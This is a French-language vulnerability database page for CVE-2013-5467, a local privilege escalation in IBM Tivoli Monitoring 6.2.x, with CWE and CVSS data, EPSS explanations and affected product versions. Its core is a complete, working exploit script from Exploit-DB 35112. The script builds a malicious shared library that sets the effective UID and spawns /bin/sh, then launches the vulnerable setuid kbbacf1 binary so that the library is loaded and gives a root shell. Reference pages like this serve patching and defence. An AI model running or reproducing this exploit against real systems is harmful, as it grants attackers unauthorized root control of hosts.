Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-264 |
Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
7.2 |
|
AV:L/AC:L/Au:N/C:C/I:C/A:C |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 35112
Date de publication : 2014-10-28 23h00 +00:00
Auteur : Robert Jaroszuk
EDB Vérifié : No
#!/bin/sh
# Title: IBM Tivoli Monitoring V6.2.2 kbbacf1 privilege escalation exploit
# CVE: CVE-2013-5467
# Vendor Homepage: http://www-03.ibm.com/software/products/pl/tivomoni
# Author: Robert Jaroszuk
# Tested on: RedHat 5, Centos 5
# Vulnerable version: IBM Tivoli Monitoring V6.2.2 (other versions not tested)
#
echo "[+] Tivoli pwner kbbacf1 privilege escalation exploit by Robert Jaroszuk"
echo "[+] Preparing the code..."
cat > kbbacf1-pwn.c << DONE
#define _GNU_SOURCE
#include <unistd.h>
#include <stdlib.h>
#include <dlfcn.h>
void __cxa_finalize (void *d) {
return;
}
void __attribute__((constructor)) init() {
setresuid(geteuid(), geteuid(), geteuid());
execl("/bin/sh", (char *)NULL, (char *)NULL);
}
DONE
cat > version << DONE
GLIBC_2.2.5 { };
GLIBC_2.3 { };
GLIBC_2.3.2 { };
GLIBC_PRIVATE { };
DONE
echo "[+] Preparing the code... part2"
/usr/bin/gcc -Wall -fPIC -shared -static-libgcc -Wl,--version-script=version -o libcrypt.so.1 kbbacf1-pwn.c
echo "[+] Cleaning up..."
/bin/rm -f kbbacf1-pwn.c version
echo "[+] Exploiting."
/opt/IBM/ITM/tmaitm6/lx8266/bin/kbbacf1
Products Mentioned
Configuraton 0
Ibm>>Monitoring_agent_for_unix_logs >> Version 6.2.0
Ibm>>Monitoring_agent_for_unix_logs >> Version 6.2.1
Ibm>>Monitoring_agent_for_unix_logs >> Version 6.2.2
Ibm>>Monitoring_agent_for_unix_logs >> Version 6.2.3
Ibm>>Monitoring_server_\(ms\)_and_shared_libraries_\(ax\) >> Version 6.2.0
- Ibm>>Monitoring_server_\(ms\)_and_shared_libraries_\(ax\) >> Version 6.2.0 (Open CPE detail)
Ibm>>Monitoring_server_\(ms\)_and_shared_libraries_\(ax\) >> Version 6.2.1
- Ibm>>Monitoring_server_\(ms\)_and_shared_libraries_\(ax\) >> Version 6.2.1 (Open CPE detail)
Ibm>>Monitoring_server_\(ms\)_and_shared_libraries_\(ax\) >> Version 6.2.2
- Ibm>>Monitoring_server_\(ms\)_and_shared_libraries_\(ax\) >> Version 6.2.2 (Open CPE detail)
Ibm>>Monitoring_server_\(ms\)_and_shared_libraries_\(ax\) >> Version 6.2.3
- Ibm>>Monitoring_server_\(ms\)_and_shared_libraries_\(ax\) >> Version 6.2.3 (Open CPE detail)
Ibm>>Monitoring_server_\(ms\)_and_shared_libraries_\(ax\) >> Version 6.3.0
- Ibm>>Monitoring_server_\(ms\)_and_shared_libraries_\(ax\) >> Version 6.3.0 (Open CPE detail)
Linux>>Linux_kernel >> Version *
Références